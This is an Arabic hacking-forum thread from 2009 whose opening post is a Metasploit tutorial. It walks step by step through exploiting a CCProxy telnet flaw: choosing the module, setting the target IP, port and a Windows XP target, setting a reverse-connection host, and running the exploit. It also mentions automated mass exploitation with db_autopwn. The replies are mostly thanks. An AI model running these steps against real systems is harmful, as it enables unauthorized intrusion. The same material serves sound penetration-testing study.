يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > MetaSploit
تحديث الصفحة استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل
التسجيل التعليمات التقويم مشاركات اليوم البحث

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-16-2009, 02:02 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Wolf_112
 

 
 
إحصائية العضو






Wolf_112 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Wolf_112 is on a distinguished road
.... استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل

السلام عليكم ورحمة الله وبركاته


اخواني الاعزاء اعضاء منتدى العناكب اقدم لكم شرح بسيط عن Metasploit وطرق استغلال ثغراته

اخواني Metasploit يحتوي على الكثير من الثغرات وهو يعرض لك الثغره وطرق عديده للاستغلال وانت وشطارتك اخواني انا ما حبيت اني اعلمكم على طريقه واحده فقط انا ابي اعلمكم على الاساسيات في Metasploit علشان تبدأمن عندها الى الاحتراف باذن الله

اخواني انا منزل الصور من مدونة اخوي العزيز::br4v3-h34r7 جزاه الله خير لاني ما اشتغل على جهازي يعني اكتب لكم هالشرح وانا على جهاز اخوي<<<ماشاء الله مسوي يمون على الجهاز

والصراحه الموضوع يصلح اني احطه في قسم السيرفرت والاجهزه لان الطرق في المشروع للاثنين متشابهه نوعا ما والشائع في استخدامه للسيرفرات والمواقع اكثر منه على الاجهزه العاديه

المهم ما ابي اطول عليكم يلااا نبدأ الشرح""


بدأ مشروع ثغرات Metasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع Metasploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا…


لكل شيء محاسن و مساوء قوة مشروع ميتاسبلويت و سهولة استخدامه جعلت الكثيرين من الأطفال الذين يظنون أنفسهم Hackers يستخدمه لاختراق أجهزة الآخرين و التحكم بها بتنفيذ بضعة أوامر دون أي معرفة أو فهم بالثغرة, سببها, برمجتها أو حتى كيفية استغلاله

نبدأ بفتح سطر الأوامر و من ثم الذهاب للمجلد الموجود به مشروع Metasploit

بعد ذلك نقوم بتشغيل سطر أوامر مشروع Metasploit بتنفيذ الأمر:

كود:
msfconsole


*ملاحظه الشرح على الينوكس وانا لا انصح باستخدامه على الويندوز.


نكمل

اول ما يبدا في التشغيل راح يعطينا تفاصيل عنه مثل الاصدار والثغرات الموجوده .....الخ


لنتمكن من استغلال ثغرة Metasploit هنالك بضعة خطوات يجب القيام بها, تختلف هذه الخطوات و الخيارات من ثغرة لأخرى الا أنها متشابهة بشكل عام. أول شيء علينا تحديد الثغرة التي نريد استغلالها بعد ذلك نحدد الخيارات الخاصة بها مثل الاصدار المصاب, نظام التشغيل, الاستغلال… ثم ننفذ الثغرة و نستخدمها حسب الاستغلال المحدد في الخيارات, يوجد الكثير من الأوامر التي يمكننا استخدامها في مشروع ميتاسبلويت لمعرفتها نقوم بتنفيذ الأمر التالي::

كود:
msf > help



ما يهمنا حاليا في استغلال الثغرات هي الأوامر المظللة في الصورة وهي "show"&"info"&"use"


نستخدم الأمر الأول لاظهار الثغرات الموجودة في المشروع أما الثاني لاظهار معلومات مفصلة عن الثغرة و مصادر خارجية عنها و الثالث لاستخدام الثغرة و تحديد خياراتها


نبدا بالأمر الاول وهو "show" علشان نشوف الثغرات الموجوده بالأدات في اصح تعبير

وعلشان ننفذ الامر في الاداة نكتب الامر هذا وبعدين نضغط انتر::

كود:
msf > show exploits


كما هو واضح تم اظهار عدد كبير من الثغرات و بجانب كل ثغرة معلومات بسيطة عن البرنامج/النظام و الاصدار المصاب

ولاظهار تفاصيل ثغرة معينه اكتب الامر"info" وبعده مسافه ويعده اسم الثغره اللي تبيها
مثال على ذلك:

كود:
msf > info windows/proxy/ccproxy_telnet_ping
بعد تنفيذ الأمر السابق سيتم اظهار كافة المعلومات المتوفرة عن الثغرة الموجودة في برنامج CCProxy الاصدار 6.2 كما هو واضح في الصورة التالية:



قبل البدء باستخدام الثغرة نلاحظ الخيارات المتوفرة لها و كما قلت سابقا تختلف الخيارات من ثغرة لأخرى لكن في هذه الثغرة يوجد لدينا خيارين أساسيين الأول هو IP السيرفر الذي يستعمل برنامج CCProxy أما الثاني فهو المنفذ الذي يستخدمه البرنامج, أيضا لا ننسى تحديد النظام فهذا شيء مهم في ثغرات Metasploit خصوصا أنظمة Windows و اصداراتها و علينا معرفة أن استغلال هذه النوعية من الثغرات دقيق جدا و صعوبة استغلالها تكمن في دقتها فأي خيار خاطئ نحدده لن يمكننا من استغلال الثغرة بشكل صحيح
الان ننفذ الامر"use" علشان نستخدم الثغره
نكمل على مثالنا السابق
كود:
msf > use windows/proxy/ccproxy_telnet_ping
وتذكر بين كل امر وامر تنفذه نفذ الامر "show" علشان تشوف الخيارات اللي ممكن تسويه والطريقه الصحيحه في استغلالها
نكمل

و نستخدم الأمر show لاظهار خيارات الثغرة المتوفرة
مثال::
كود:
msf  exploit(ccproxy_telnet_ping) > show options
نحدد الخيارات التي تناسبنا باستخدام الأمر set كما هو واضح من الصورة التالية:


في الصورة السابقه قمنا بتحديد اي بي المستهدف بالأمر"set" وبعده الخيار "RHOST"
مثال::
كود:
msf  exploit(ccproxy_telnet_ping) > set RHOST 192.168.0.53
بالنسبة لي كان 192.168.0.53 و أبقيت الخيار RPORT نفسه 23 و هو المنفذ الذي يستخدمه برنامج CCProxy بشكل افتراضي و طبعا يمكن تغييره بحسب المنفذ المستخدم مثلا 34 باستخدام الأمر"set" مثال:
كود:
msf  exploit(ccproxy_telnet_ping) > set RPORT 34
بعد ذلك نقوم باظهار الأنظمة المتاحة باستخدام الأمر:
كود:
msf  exploit(ccproxy_telnet_ping) > show targets
نحدد الخيار 4 و هو نظام Windows XP SP2 - English بتنفيذ:
كود:
msf  exploit(ccproxy_telnet_ping) > set TARGET 4


أما الآن نظهر الاستغلالات المتاحة لهذه الثغرة باستخدام الأمر:
كود:
msf  exploit(ccproxy_telnet_ping) > show payloads
مع العلم من امكانية تحديد أي استغلال آخر نريد مثل تنفيذ أمر محدد على النظام, فتح منفذ و الاتصال به عن طريق أداة الـ Netcat, تحميل ملف و تشغيله أو حتى اضافة مستخدم جديد للنظام بصلاحيات Administrator, الأن ننفذ الأمر
كود:
msf  exploit(ccproxy_telnet_ping) > show options


يمكننا الأن تحديد خيارات الاستغلال مثل LHOST وهو IP جهازنا و LPORT هو المنفذ الذي سيتم الاتصال العكسي عن طريقه بتنفيذ الأمر
كود:
msf  exploit(ccproxy_telnet_ping) > set LHOST 192.168.0.41
الأن لم يبقى علينا الا تطبيق الأمر
كود:
msf  exploit(ccproxy_telnet_ping) > exploit
مع العلم من امكانية تنفيذ أكثر من استغلال على أكثر من جهاز و الحصول على اتصالات أخرى.. أو القيام بهذه العملية بشكل أوتوماتيكي باستخدام احدى أدوات ميتاسبلويت الخطيرة و هي db_autopwn كل ما ذكر سابقا مجرد مثال بسيط عن احدى ثغرات الميتاسبلويت لكن المشروع أقوى من ذلك بكثير و يوجد له استخدمات و ثغرات أخرى كل ماعليك الأن هو التجربة و اعادة المحاولة و لا تتوقع أن تتمكن من استغلال الثغرة من أول مرة أو ثاني مرة و لا حتى بعد 10 مرات كل مرة تجرب بها ثغرة ستكشف شيء جديد و خطأ قمت به و تذكر أن الدقة أهم شيء في استغلال ثغرات مشروع الميتاسبلويت فتحديد البرنامج و الاصدار المصاب أصعب من استغلال الثغرة المكتوبة له. من الجميل أيضا في مشروع ميتاسبلويت هو وجود واجهات رسومية جميلة لتسهيل التعامل مع المشروع و مخصصة للأشخاص الذين لايحبون استخدام سطر الأوامر

الواجهة الرسومية العادية GUI لتشغيلها ننفذ الأمر التالي داخل مجلد مشروع Metasploit
كود:
./msfgui
لنفرض الآن أننا نريد استغلال ثغرة غير موجودة في مشروع الميتاسبلويت أحضرناها من موقع Milw0rm مثلا كيف سنضيفها؟ بصراحة وجدت الكثيرين لا يعرفون الطريقة رغم بساطتها و طبعا الشرح للينوكس و نصيحة للجميع ابتعدوا عن ويندوز في هذه الأمور, كما نعرف في الاصدار 2 السابق من مشروع Metasploit كان المشروع و ثغراته تبرمج بلغة Perl و تأتي بالامتداد pm أما في الاصدار 3 تم اعادة برمجة المشروع من جديد بلغة Ruby و تأتي الثغرة بالامتداد rb لذلك أول شيء علينا معرفة نوعية الثغرة هل هي للاصدار 3.0 أم لاصدارات سابقة 2.0 ؟ أتوقع أن الاختلاف بين الكود البرمجي بين اللغتين واضح جدا وهذا سوف اتطرق اليه في الموضوع الثاني ان شاء الله

طولت عليكم اخواني اتمنى انكم استفدتوا من الشرح خير استفاد واتمنى انه واضح واعيد ما قلته انا نزلت الصور من مدونه اخوي::br4v3-h34r7 علشان ما يطلع لي واحد الحين ويقول اني ناقله


اشكركم واتمنى لكم الصحه والعافيه اخوكم::wolf_112

hsjo]hl lav,u Metasploit , avp hsjyghg eyvhji fhgjtwdg

التوقيع

,

 

التعديل الأخير تم بواسطة Wolf_112 ; 05-16-2009 الساعة 02:28 PM.

   

رد مع اقتباس
قديم 05-16-2009, 03:13 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية Wolf_112
 

 
 
إحصائية العضو






Wolf_112 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Wolf_112 is on a distinguished road
افتراضي

نسيت لا احط لكم رابط تحميل الاداة خخخخخخخخخخخخخخخخ :d

وتثبيتها سهل زي اي برنامج تثبته

تفضلو

www.metasploit.com

اعذروني على الخطأ او الزلل

التوقيع

,

 

   

رد مع اقتباس
قديم 05-16-2009, 10:20 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية ابو بدر
 

 
 
إحصائية العضو







ابو بدر غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
ابو بدر is on a distinguished road
افتراضي

مشكوووووووووور اخوي ذيب _ 112

   

رد مع اقتباس
قديم 05-16-2009, 10:36 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
The Final Doom
:: vBspiders Founder ::
 
الصورة الرمزية The Final Doom
 

 
 
إحصائية العضو









The Final Doom غير متواجد حالياً

إرسال رسالة عبر ICQ إلى The Final Doom إرسال رسالة عبر AIM إلى The Final Doom إرسال رسالة عبر MSN إلى The Final Doom إرسال رسالة عبر Yahoo إلى The Final Doom إرسال رسالة عبر Skype إلى The Final Doom

 

 

إحصائية الترشيح

عدد النقاط : 12
The Final Doom is on a distinguished road
افتراضي

مشكور حبيبي
شرح رائع من شخص اروع
بطل

التوقيع




In God, You have to trust

$Contact
Skype:imadgb20
//
\\

 

   

رد مع اقتباس
قديم 05-16-2009, 11:45 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية Wolf_112
 

 
 
إحصائية العضو






Wolf_112 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Wolf_112 is on a distinguished road
افتراضي

اشكركم اخواني ابو بدر & دوووم المتالق على مروركم الذي اسعدني وان شاء الله يدا بيد لنرتقي بالمنتدى

التوقيع

,

 

   

رد مع اقتباس
قديم 05-26-2009, 12:23 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية Sniper_Mo
 

 
 
إحصائية العضو







Sniper_Mo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Sniper_Mo is on a distinguished road
افتراضي

شكرا لك شرح مميز تقبل احتراماتي

التوقيع

سيستمر غيابي عن الشبكة والانترنت لعدة اسابيع اخرى. ارجو ان تدعولي لانني امر بازمات :088: عدة. وشكرا لكم

 

   

رد مع اقتباس
قديم 05-26-2009, 01:54 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية Wolf_112
 

 
 
إحصائية العضو






Wolf_112 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Wolf_112 is on a distinguished road
افتراضي

اشكرك اخوي على المرور والرد الرائعين والى الامام

التوقيع

,

 

   

رد مع اقتباس
قديم 06-04-2009, 03:00 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية megainfo
 

 
 
إحصائية العضو





megainfo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
megainfo is on a distinguished road
افتراضي

Merci mon frère,

une question svp , est se que le metaespaloit possèd des exploit sur WAN

par ce qu je vois que la plus part des exploits marche sur LAN.

merci.

التوقيع

http://img408.imageshack.us/img408/9...dermanlogo.jpg

 

   

رد مع اقتباس
قديم 06-04-2009, 11:58 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية BoM AtTaCk
 

 
 
إحصائية العضو






BoM AtTaCk غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
BoM AtTaCk is on a distinguished road
افتراضي

شرح رآئع ووآضح ~ مشكور حبيبي ماقصرت يالغلا ~

التوقيع

BoM AtTaCk

o_l8@hotmail.com

respect me so i can respect you

:666:

 

   

رد مع اقتباس
قديم 06-04-2009, 12:01 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
MrXRoMaNcE1
VBSPIDERS TEAM
 
الصورة الرمزية MrXRoMaNcE1
 

 
 
إحصائية العضو






MrXRoMaNcE1 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MrXRoMaNcE1 is on a distinguished road
افتراضي

يعطيك العافية

التوقيع

 

   

رد مع اقتباس
قديم 06-05-2009, 05:19 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية Red Line
 

 
 
إحصائية العضو






Red Line غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Red Line is on a distinguished road
افتراضي

مشكووور

التوقيع

 

   

رد مع اقتباس
قديم 06-06-2009, 12:14 AM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية Red Line
 

 
 
إحصائية العضو






Red Line غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Red Line is on a distinguished road
افتراضي

مشكووور وما تقصر ونقدر جهودك الجبارة

التوقيع

 

   

رد مع اقتباس
قديم 06-09-2009, 04:09 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية Wolf_112
 

 
 
إحصائية العضو






Wolf_112 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Wolf_112 is on a distinguished road
افتراضي

مشكوووورين على المرور والصراحه نورتو الموضوع

التوقيع

,

 

   

رد مع اقتباس
قديم 11-26-2010, 08:24 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية ouTLaw
 

 
 
إحصائية العضو






ouTLaw غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ouTLaw is on a distinguished road
افتراضي

مشكووور

التوقيع

[align=center]وَتِلْكَ حُدُودُ اللَّهِ وَمَنْ يَتَعَدَّ حُدُودَ اللَّهِ فَقَدْ ظَلَمَ نَفْسَهُ [/align]

 

   

رد مع اقتباس
قديم 12-16-2010, 04:38 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية rakeeem
 

 
 
إحصائية العضو





rakeeem غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
rakeeem is on a distinguished road
افتراضي

[align=center] مهكور يا الغلا وجارى التحميل [/align]

التوقيع

لااله الا الله محمد رسول الله
عليها نحيا وعليها نموت
وفي سبيلها نجاهد ومن أجلها نلقى الله

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل Italiano Algerino Hacker MetaSploit 13 12-28-2015 04:59 PM
استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل PiNki قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 9 10-18-2011 02:00 PM
استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل ViRuS Qalaa MetaSploit 1 07-03-2010 03:09 AM
اضافة ثغره على مشروع Metasploit Wolf_112 MetaSploit 12 07-16-2009 04:26 PM


الساعة الآن 11:32 AM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0